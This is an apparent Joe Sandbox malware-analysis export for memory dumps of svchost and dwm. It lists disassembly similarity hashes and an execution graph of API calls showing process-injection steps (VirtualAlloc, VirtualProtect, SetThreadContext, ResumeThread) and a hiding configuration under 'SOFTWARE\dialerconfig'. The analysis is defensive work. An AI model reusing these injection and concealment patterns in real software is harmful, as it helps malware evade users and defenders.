                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_2a661300000_svchost.jbxd
                                            Similarity
                                            • API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
                                            • String ID:
                                            • API String ID: 517849248-0
                                            • Opcode ID: bec16919e3b07d6ab1f360bf5186f0ec190c680636fdb39b4f696954ffc34d04
                                            • Instruction ID: 331f07f1c56a884374ab0073a6da1fef4a138c943355aa0f21201652e5049059
                                            • Opcode Fuzzy Hash: bec16919e3b07d6ab1f360bf5186f0ec190c680636fdb39b4f696954ffc34d04
                                            • Instruction Fuzzy Hash: 20015731B00A4197EA10EB12A85C35967A9FB89FD5F488435CE8A53754DF3CC98AC341
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2985681750.000002A661300000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_2a661300000_svchost.jbxd
                                            Similarity
                                            • API ID: CurrentProcessProtectVirtual$HandleModuleTerminateThread
                                            • String ID:
                                            • API String ID: 449555515-0
                                            • Opcode ID: e4252fc9f6451678ca3b672aa508af9be8436cc55dc462e8819adcbe9d266895
                                            • Instruction ID: a03370b0f1b99888e82360213d0c999877f66a98b6860f64e43c67a9d98e6456
                                            • Opcode Fuzzy Hash: e4252fc9f6451678ca3b672aa508af9be8436cc55dc462e8819adcbe9d266895
                                            • Instruction Fuzzy Hash: 74111B65B1174087FB25DB22E80E75676A8BB4AF91F080425CA4B27754EF3DC50C8742
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2985681750.000002A661300000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_2a661300000_svchost.jbxd
                                            Similarity
                                            • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                            • String ID: csm$f
                                            • API String ID: 2395640692-629598281
                                            • Opcode ID: a12096fde07cdb9e3353675e9d74aeeedb8b2868f95cbc04e37ad4e594267797
                                            • Instruction ID: 461482e568c637631849338c705f3eaada8f21a57059969d29b558982f2f280f
                                            • Opcode Fuzzy Hash: a12096fde07cdb9e3353675e9d74aeeedb8b2868f95cbc04e37ad4e594267797
                                            • Instruction Fuzzy Hash: B5517632B116048BEB18CE25E44CB5937EDF346F99F598124DA1B67788EF39C849C782
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2985681750.000002A661300000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_2a661300000_svchost.jbxd
                                            Similarity
                                            • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                            • String ID: csm$f
                                            • API String ID: 2395640692-629598281
                                            • Opcode ID: 9d9690251bde7e8cf310a92dbdf710b9b231990aa6f8d8297185bd8ead255550
                                            • Instruction ID: 8cba797f111996638c92f3be6104cd123b816c25eff81f7ebdcd395d45cc5ed0
                                            • Opcode Fuzzy Hash: 9d9690251bde7e8cf310a92dbdf710b9b231990aa6f8d8297185bd8ead255550
                                            • Instruction Fuzzy Hash: B3317432B0064097E618DF22E84CB1937A9F346F99F098118EA5B27785CF39C949C786
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2985681750.000002A661300000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_2a661300000_svchost.jbxd
                                            Similarity
                                            • API ID: FinalHandleNamePathlstrlen
                                            • String ID: \\?\
                                            • API String ID: 2719912262-4282027825
                                            • Opcode ID: 16112503ebd4bbaf0721a34979430d9d9890d46ad4397212c59debcfc05cbbbd
                                            • Instruction ID: 2b181269923a5af29811523aae9a9715c4d76484b532f06836e06ca17225f93c
                                            • Opcode Fuzzy Hash: 16112503ebd4bbaf0721a34979430d9d9890d46ad4397212c59debcfc05cbbbd
                                            • Instruction Fuzzy Hash: F1F04F72704A4193EB20DB25F49D399B7B9F745F99F888030CA8A57954DF2CC68DCB41
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2985681750.000002A661300000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_2a661300000_svchost.jbxd
                                            Similarity
                                            • API ID: CombinePath
                                            • String ID: \\.\pipe\
                                            • API String ID: 3422762182-91387939
                                            • Opcode ID: a10b9fbf5d2c898f7c9b708695815e9cf74f4df3f8d5b839e299d2cca4937a3b
                                            • Instruction ID: f5a1980f7c610e79436a11b398841ed97fec700dc0cbf7dd1e7166cb89351677
                                            • Opcode Fuzzy Hash: a10b9fbf5d2c898f7c9b708695815e9cf74f4df3f8d5b839e299d2cca4937a3b
                                            • Instruction Fuzzy Hash: 88F08220B04B8093EA00DB13F90E1597668AB4AFE1F0C8131DE9B27B28CF2CC49AC301
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2985681750.000002A661300000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_2a661300000_svchost.jbxd
                                            Similarity
                                            • API ID: AddressFreeHandleLibraryModuleProc
                                            • String ID: CorExitProcess$mscoree.dll
                                            • API String ID: 4061214504-1276376045
                                            • Opcode ID: 9217264d43014ce808c99de8a8145fbe135b698a21aa29953e209d5462850717
                                            • Instruction ID: 4df176fab3eac4105edad8b9749e0397101cff3075760181ddbd3ecdbcb94a2e
                                            • Opcode Fuzzy Hash: 9217264d43014ce808c99de8a8145fbe135b698a21aa29953e209d5462850717
                                            • Instruction Fuzzy Hash: 22F01261B1164493EF589B60F88D36937A8EF49FD5F4C2419950B57674DF2CC58CC702
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2985681750.000002A661300000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_2a661300000_svchost.jbxd
                                            Similarity
                                            • API ID: CurrentThread
                                            • String ID:
                                            • API String ID: 2882836952-0
                                            • Opcode ID: 065eb2a24c7300192409b1f4bca8757e198c759726111ad2bde78b52490ea3d6
                                            • Instruction ID: 90785e1c39c9657ebb0966d5b819a78446fd2ce121af7c2d17050c564d8ee3bb
                                            • Opcode Fuzzy Hash: 065eb2a24c7300192409b1f4bca8757e198c759726111ad2bde78b52490ea3d6
                                            • Instruction Fuzzy Hash: 3B02D932619B84C7E760CB59F49835AB7A4F3C6B91F141015EA8E97BA8DF7CC488CB41
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2985681750.000002A661300000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_2a661300000_svchost.jbxd
                                            Similarity
                                            • API ID: ConsoleErrorLastMode_invalid_parameter_noinfo
                                            • String ID:
                                            • API String ID: 2210144848-0
                                            • Opcode ID: 4bcbd420be841bafcf1cb86917f82a61becb6801fc8ef256a9047459a88e7092
                                            • Instruction ID: 8aa0878b4f97bec40b88aa89525aaa0c74d8548bc027b4084bccae2cd63156eb
                                            • Opcode Fuzzy Hash: 4bcbd420be841bafcf1cb86917f82a61becb6801fc8ef256a9047459a88e7092
                                            • Instruction Fuzzy Hash: E481D132F106408AFB509B61885E3AD3AA9F746F94F4C4215DE4BB7A95DF3C846AC312
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2985681750.000002A661300000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_2a661300000_svchost.jbxd
                                            Similarity
                                            • API ID: CurrentThread
                                            • String ID:
                                            • API String ID: 2882836952-0
                                            • Opcode ID: 94d32eef5ebe536b0a0adfa3e0b32a568b4410008b4bb6dfd84b7e083660618c
                                            • Instruction ID: fa1833fee047542339fb4bee660ae3a7f67998ead17e02992f85dbf256e6eae3
                                            • Opcode Fuzzy Hash: 94d32eef5ebe536b0a0adfa3e0b32a568b4410008b4bb6dfd84b7e083660618c
                                            • Instruction Fuzzy Hash: 5061C736A19B80C7E760CB15E44C31AB7E8F38AB45F141115EA8E53BA8CF7CC548CB46
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2984385637.000002A6612D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A6612D0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_2a6612d0000_svchost.jbxd
                                            Similarity
                                            • API ID: _set_statfp
                                            • String ID:
                                            • API String ID: 1156100317-0
                                            • Opcode ID: 26a546e7bd77f8ca3fc0338f00591d5630f622d4a827b8b98863898f65805266
                                            • Instruction ID: 282d6ea6c085c75b559c4eecab295731d6df6bcc1aeec4f266239e96254006d3
                                            • Opcode Fuzzy Hash: 26a546e7bd77f8ca3fc0338f00591d5630f622d4a827b8b98863898f65805266
                                            • Instruction Fuzzy Hash: 5911A322F54AC003F6641375E45E36912BC6B57B74F4C0634AA7607BD78F1C8EC98102
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2985681750.000002A661300000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_2a661300000_svchost.jbxd
                                            Similarity
                                            • API ID: _set_statfp
                                            • String ID:
                                            • API String ID: 1156100317-0
                                            • Opcode ID: 26a546e7bd77f8ca3fc0338f00591d5630f622d4a827b8b98863898f65805266
                                            • Instruction ID: 78f1e09ebe91069fde2cfe5cecec6e314050ca4ced6c13427bf44ac0d6cc4aa3
                                            • Opcode Fuzzy Hash: 26a546e7bd77f8ca3fc0338f00591d5630f622d4a827b8b98863898f65805266
                                            • Instruction Fuzzy Hash: 8C119E36F58A0003F6A81178E55F3A97069AB77B74F1C0724AA7B276DA8F5C8C4E4202
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2985681750.000002A661300000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_2a661300000_svchost.jbxd
                                            Similarity
                                            • API ID: CurrentProcessProtectVirtual$HandleModule
                                            • String ID:
                                            • API String ID: 1092925422-0
                                            • Opcode ID: a6312042db82c9c62213c4cc61283d131af5cc2d1631b4a6c699d8a5d8d1a662
                                            • Instruction ID: 5de2aea850e14d70eb11c96f7812abb78d1b7e8127be60e8cf67db41b6ecfb1c
                                            • Opcode Fuzzy Hash: a6312042db82c9c62213c4cc61283d131af5cc2d1631b4a6c699d8a5d8d1a662
                                            • Instruction Fuzzy Hash: 8011182AB04B4087EB54DB11E40D76976A8FB4AF95F080029DE8A17794EF3DC5088741
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2984385637.000002A6612D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A6612D0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_2a6612d0000_svchost.jbxd
                                            Similarity
                                            • API ID: CurrentImageNonwritable__except_validate_context_record
                                            • String ID: csm$f
                                            • API String ID: 3242871069-629598281
                                            • Opcode ID: a12096fde07cdb9e3353675e9d74aeeedb8b2868f95cbc04e37ad4e594267797
                                            • Instruction ID: a2496d3c7ddad3d354ece01c9d6e321c93b1a255c05b5a6eb78cde2e634084ab
                                            • Opcode Fuzzy Hash: a12096fde07cdb9e3353675e9d74aeeedb8b2868f95cbc04e37ad4e594267797
                                            • Instruction Fuzzy Hash: 6851AF32F126408BDB14CF25E84CB58339DFB42FA8F59A124DA4643788DF38D9C99746
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2984385637.000002A6612D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A6612D0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_2a6612d0000_svchost.jbxd
                                            Similarity
                                            • API ID: CurrentImageNonwritable__except_validate_context_record
                                            • String ID: csm$f
                                            • API String ID: 3242871069-629598281
                                            • Opcode ID: 9d9690251bde7e8cf310a92dbdf710b9b231990aa6f8d8297185bd8ead255550
                                            • Instruction ID: 12aedaf196ce0c41363de339bde528673567e858345642c02141eeaadbb587cc
                                            • Opcode Fuzzy Hash: 9d9690251bde7e8cf310a92dbdf710b9b231990aa6f8d8297185bd8ead255550
                                            • Instruction Fuzzy Hash: D2316A76B1168097E7149F21E84CB5937ACFB42F98F5AA014EE5A07788CF3CC989D706
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2985681750.000002A661300000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_2a661300000_svchost.jbxd
                                            Similarity
                                            • API ID: Heap$Process$Free
                                            • String ID:
                                            • API String ID: 3168794593-0
                                            • Opcode ID: 5f7cef85691391bfd1f64b5ed8b2db0144129af346a3a3b2b5e725a5d1a6a2a2
                                            • Instruction ID: e67698bfd7912cac5bd800f33a611c970f87d1252693b1fcbc527840f8256d78
                                            • Opcode Fuzzy Hash: 5f7cef85691391bfd1f64b5ed8b2db0144129af346a3a3b2b5e725a5d1a6a2a2
                                            • Instruction Fuzzy Hash: C6115B72A14B8893E754EF66A84D21A77B4F78AF94F084029EB8B23755DF3CC0598741
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2985681750.000002A661300000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_2a661300000_svchost.jbxd
                                            Similarity
                                            • API ID: FileType
                                            • String ID: \\.\pipe\
                                            • API String ID: 3081899298-91387939
                                            • Opcode ID: 6e49d471cca68daba176b61e5ee439cd114eed484b1fe0d421767ac79cd7910d
                                            • Instruction ID: 8935ae60fd7875c6a519039d36bc47552768e08d90f04f0b2b20aad67cf4645d
                                            • Opcode Fuzzy Hash: 6e49d471cca68daba176b61e5ee439cd114eed484b1fe0d421767ac79cd7910d
                                            • Instruction Fuzzy Hash: 0371B236B0078147EB64DA369A4C3AA67D8F746FC5F480016DE4B63B99DF39C608C782
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2985681750.000002A661300000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_2a661300000_svchost.jbxd
                                            Similarity
                                            • API ID: FileType
                                            • String ID: \\.\pipe\
                                            • API String ID: 3081899298-91387939
                                            • Opcode ID: afcb3e66faa42eb2bcf346096e8e020fbdcda90173b34b97db97a4810a61a98e
                                            • Instruction ID: d7711c9e83a1894a29492c74cbdb36065285409975d89d68dcb66489ac376cc9
                                            • Opcode Fuzzy Hash: afcb3e66faa42eb2bcf346096e8e020fbdcda90173b34b97db97a4810a61a98e
                                            • Instruction Fuzzy Hash: 4351EB32B0478583E6349E399A5C36AA6D9F387F91F1D0025CD8B23B99CF7DC4098B81
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2985681750.000002A661300000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_2a661300000_svchost.jbxd
                                            Similarity
                                            • API ID: ErrorFileLastWrite
                                            • String ID: U
                                            • API String ID: 442123175-4171548499
                                            • Opcode ID: a13edceeabc266f7553562aa63bd5b4e25a5c0a5c0c842b56dee7ecd57ba2728
                                            • Instruction ID: 26148cedc7e7393984548b0d27a179502ff655e41e471cbadbe1c26882793d0d
                                            • Opcode Fuzzy Hash: a13edceeabc266f7553562aa63bd5b4e25a5c0a5c0c842b56dee7ecd57ba2728
                                            • Instruction Fuzzy Hash: 5941E632B14A4082EB20DF25E44D39AB7A4F389BD4F584021EE8E97788DF3CC455CB41
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2985681750.000002A661300000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_2a661300000_svchost.jbxd
                                            Similarity
                                            • API ID: Stringtry_get_function
                                            • String ID: LCMapStringEx
                                            • API String ID: 2588686239-3893581201
                                            • Opcode ID: 8d086b69a67710f16bbac061c243311228bfa9ac644515e4c5b930ef6255b9c6
                                            • Instruction ID: 5299850c71e00a34e9ab231a5fc861aac41e51d00e5afb72f0c3f518ed32c545
                                            • Opcode Fuzzy Hash: 8d086b69a67710f16bbac061c243311228bfa9ac644515e4c5b930ef6255b9c6
                                            • Instruction Fuzzy Hash: 50110B36708BC086DB60CF15B44829AB7A8F7C9F94F584126EE8E53B59DF3CC4548B40
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2985681750.000002A661300000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_2a661300000_svchost.jbxd
                                            Similarity
                                            • API ID: ExceptionFileHeaderRaise
                                            • String ID: csm
                                            • API String ID: 2573137834-1018135373
                                            • Opcode ID: 9d9897ce25571c28e51806bf44cef2494793ace286fcfb8ca6bb858d3561ec5c
                                            • Instruction ID: bd88ddc39b80fbe161f04c61a485dee9a5def588c444f122c90a1622165b6d6c
                                            • Opcode Fuzzy Hash: 9d9897ce25571c28e51806bf44cef2494793ace286fcfb8ca6bb858d3561ec5c
                                            • Instruction Fuzzy Hash: 8F113A32608B8082EB618F15E4483597BE8F789F98F1D4220DE8E17B68DF3DC559CB41
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2985681750.000002A661300000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_2a661300000_svchost.jbxd
                                            Similarity
                                            • API ID: CountCriticalInitializeSectionSpintry_get_function
                                            • String ID: InitializeCriticalSectionEx
                                            • API String ID: 539475747-3084827643
                                            • Opcode ID: 84d4d9e5c8567b0c470c1df2abda769c6c41ef7958af45e9a0e3fb38bbb318e4
                                            • Instruction ID: b4c49a4aae0989cb96510c2edbffded8341e8a649ebced7b63add6fe05655295
                                            • Opcode Fuzzy Hash: 84d4d9e5c8567b0c470c1df2abda769c6c41ef7958af45e9a0e3fb38bbb318e4
                                            • Instruction Fuzzy Hash: 6EF0E221B10780C3EB059B45F80D29433A8AB89FA4F8C5021A94F23B55CF3CC89DCB42
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2984385637.000002A6612D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A6612D0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_2a6612d0000_svchost.jbxd
                                            Similarity
                                            • API ID: try_get_function
                                            • String ID: November$October
                                            • API String ID: 2742660187-1636048786
                                            • Opcode ID: fdce6644ec914193c36bb80fdc4676b7f0aefee418b5ba3fb3fb30fec7b157a7
                                            • Instruction ID: 34b657edabca4fb7c16a9ca5f99ee603017589a98796ca4246c539c293f6b05d
                                            • Opcode Fuzzy Hash: fdce6644ec914193c36bb80fdc4676b7f0aefee418b5ba3fb3fb30fec7b157a7
                                            • Instruction Fuzzy Hash: 50E09261F005C593EE049B62F44C2E4622D9F85F40F5D5125D9190B252DF3CC9DEC342
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2985681750.000002A661300000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_2a661300000_svchost.jbxd
                                            Similarity
                                            • API ID: Valuetry_get_function
                                            • String ID: FlsSetValue
                                            • API String ID: 738293619-3750699315
                                            • Opcode ID: 50ddf312d192e0080d8f7be73491643e669436d55e40d94a578a073710abe0d4
                                            • Instruction ID: b14d3d8136249e5ef12ebf06390420993942a240dd072e76d802ddbc2ef96508
                                            • Opcode Fuzzy Hash: 50ddf312d192e0080d8f7be73491643e669436d55e40d94a578a073710abe0d4
                                            • Instruction Fuzzy Hash: 9DE09261B0064093EF059B50FC0E69433AABB89F95F8C9026E90B27795CF3CC85DC742
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2985681750.000002A661300000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_2a661300000_svchost.jbxd
                                            Similarity
                                            • API ID: Heap$Process$AllocFree
                                            • String ID:
                                            • API String ID: 756756679-0
                                            • Opcode ID: 3779bcfafb90e2edd239bdf2c4b5cd58a413f829d06d4561fa4d45091366f8f0
                                            • Instruction ID: 12a56478c837c39c5216bc8345ce5163ad79e49cf0720a9169c88b3f3c9e6f16
                                            • Opcode Fuzzy Hash: 3779bcfafb90e2edd239bdf2c4b5cd58a413f829d06d4561fa4d45091366f8f0
                                            • Instruction Fuzzy Hash: 0D216032B04B8082EA519F59A40C25AF7F4FB85F99F194124DE8E57B14EF7CC54AC741
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2985681750.000002A661300000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_2a661300000_svchost.jbxd
                                            Similarity
                                            • API ID: Heap$AllocProcess
                                            • String ID:
                                            • API String ID: 1617791916-0
                                            • Opcode ID: 8b038beba27963a8280261039ce2f03ebd498cc74250c16b652da3202c115688
                                            • Instruction ID: 16ddd67762c4d4c4f8100b4d624632db3f00bd7c2fc12c005352baca9613edce
                                            • Opcode Fuzzy Hash: 8b038beba27963a8280261039ce2f03ebd498cc74250c16b652da3202c115688
                                            • Instruction Fuzzy Hash: 7AE0C9B1B5160087E704EB66D81D3597AE5EB89F61F498024C94A07350DF7D8499C751

                                            Execution Graph

                                            Execution Coverage:1.3%
                                            Dynamic/Decrypted Code Coverage:90.2%
                                            Signature Coverage:0%
                                            Total number of Nodes:102
                                            Total number of Limit Nodes:16
                                            execution_graph 21218 2baae293b99 21221 2baae293ae6 21218->21221 21219 2baae293b50 21220 2baae293b36 VirtualQuery 21220->21219 21220->21221 21221->21219 21221->21220 21222 2baae293b6a VirtualAlloc 21221->21222 21222->21219 21223 2baae293b9b GetLastError 21222->21223 21223->21219 21223->21221 21224 2baaed82908 21225 2baaed82936 21224->21225 21226 2baaed82994 VirtualAlloc 21225->21226 21227 2baaed829b8 21225->21227 21226->21227 21228 2baae291c28 21233 2baae291650 GetProcessHeap HeapAlloc 21228->21233 21230 2baae291c3e Sleep SleepEx 21232 2baae291c37 21230->21232 21231 2baae2915c0 StrCmpIW StrCmpW 21231->21232 21232->21230 21232->21231 21277 2baae291274 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 21233->21277 21235 2baae291678 21278 2baae291274 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 21235->21278 21237 2baae291689 21279 2baae291274 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 21237->21279 21239 2baae291692 21280 2baae291274 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 21239->21280 21241 2baae29169b 21242 2baae2916b6 RegOpenKeyExW 21241->21242 21243 2baae2916e8 RegOpenKeyExW 21242->21243 21244 2baae2918ce 21242->21244 21245 2baae291727 RegOpenKeyExW 21243->21245 21246 2baae291711 21243->21246 21244->21232 21248 2baae291762 RegOpenKeyExW 21245->21248 21249 2baae29174b 21245->21249 21288 2baae2912c8 16 API calls 21246->21288 21250 2baae291786 21248->21250 21251 2baae29179d RegOpenKeyExW 21248->21251 21281 2baae29104c RegQueryInfoKeyW 21249->21281 21289 2baae2912c8 16 API calls 21250->21289 21256 2baae2917d8 RegOpenKeyExW 21251->21256 21257 2baae2917c1 21251->21257 21252 2baae29171d RegCloseKey 21252->21245 21260 2baae291813 RegOpenKeyExW 21256->21260 21261 2baae2917fc 21256->21261 21290 2baae2912c8 16 API calls 21257->21290 21258 2baae291793 RegCloseKey 21258->21251 21264 2baae291837 21260->21264 21265 2baae29184e RegOpenKeyExW 21260->21265 21291 2baae2912c8 16 API calls 21261->21291 21262 2baae2917ce RegCloseKey 21262->21256 21269 2baae29104c 6 API calls 21264->21269 21266 2baae291872 21265->21266 21267 2baae291889 RegOpenKeyExW 21265->21267 21271 2baae29104c 6 API calls 21266->21271 21272 2baae2918c4 RegCloseKey 21267->21272 21273 2baae2918ad 21267->21273 21268 2baae291809 RegCloseKey 21268->21260 21270 2baae291844 RegCloseKey 21269->21270 21270->21265 21274 2baae29187f RegCloseKey 21271->21274 21272->21244 21275 2baae29104c 6 API calls 21273->21275 21274->21267 21276 2baae2918ba RegCloseKey 21275->21276 21276->21272 21277->21235 21278->21237 21279->21239 21280->21241 21282 2baae2911b5 RegCloseKey 21281->21282 21283 2baae2910b9 21281->21283 21282->21248 21283->21282 21284 2baae2910c7 RegEnumValueW 21283->21284 21286 2baae29111c 21284->21286 21285 2baae291149 GetProcessHeap HeapAlloc 21285->21286 21286->21282 21286->21284 21286->21285 21287 2baae29117f GetProcessHeap HeapFree 21286->21287 21287->21286 21288->21252 21289->21258 21290->21262 21291->21268 21292 2baae262908 21293 2baae262936 21292->21293 21294 2baae262994 VirtualAlloc 21293->21294 21297 2baae262aa7 21293->21297 21296 2baae2629b8 21294->21296 21294->21297 21295 2baae262a2b LoadLibraryA 21295->21296 21296->21295 21296->21297 21298 2baae29562d 21299 2baae295634 21298->21299 21300 2baae29569b 21299->21300 21301 2baae295717 VirtualProtect 21299->21301 21302 2baae295743 GetLastError 21301->21302 21303 2baae295751 21301->21303 21302->21303 21304 2baae292a7c 21306 2baae292ac1 21304->21306 21305 2baae292b20 21306->21305 21308 2baae293930 21306->21308 21309 2baae293952 21308->21309 21310 2baae29393d StrCmpNIW 21308->21310 21309->21306 21310->21309 21311 2baae295dd0 21312 2baae295ddd 21311->21312 21313 2baae295de9 21312->21313 21320 2baae295efa 21312->21320 21314 2baae295e1e 21313->21314 21315 2baae295e6d 21313->21315 21316 2baae295e46 SetThreadContext 21314->21316 21316->21315 21317 2baae295fde 21319 2baae295ffe 21317->21319 21333 2baae2944c0 VirtualFree 21317->21333 21318 2baae295f21 VirtualProtect FlushInstructionCache 21318->21320 21329 2baae294ed0 GetCurrentProcess 21319->21329 21320->21317 21320->21318 21323 2baae296003 21324 2baae296057 21323->21324 21325 2baae296017 ResumeThread 21323->21325 21334 2baae297a20 IsProcessorFeaturePresent RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind capture_previous_context 21324->21334 21326 2baae29604b 21325->21326 21326->21323 21328 2baae29609f 21332 2baae294eec 21329->21332 21330 2baae294f33 21330->21323 21331 2baae294f02 VirtualProtect FlushInstructionCache 21331->21332 21332->21330 21332->21331 21333->21319 21334->21328

                                            Control-flow Graph

                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.3060780940.000002BAAE290000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002BAAE290000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_2baae290000_dwm.jbxd
                                            Similarity
                                            • API ID: Heap$CloseOpen$Process$Alloc$EnumFreeInfoQueryValuelstrlen
                                            • String ID: SOFTWARE\dialerconfig$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
                                            • API String ID: 106492572-2879589442
                                            • Opcode ID: 1a30f3953b7b2857fef7ab9bb527f69cc88a70ac074ccf0af09289a77df583cb
                                            • Instruction ID: 21b5fac50eec92dc7ba075ca9d08b85be9b71529412556fe0f3ca6f510548e4a
                                            • Opcode Fuzzy Hash: 1a30f3953b7b2857fef7ab9bb527f69cc88a70ac074ccf0af09289a77df583cb
                                            • Instruction Fuzzy Hash: 29714E36710A5085EF209F76E86869D37B4FB8DB88F112121DE8E47B68DF79C858C311

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
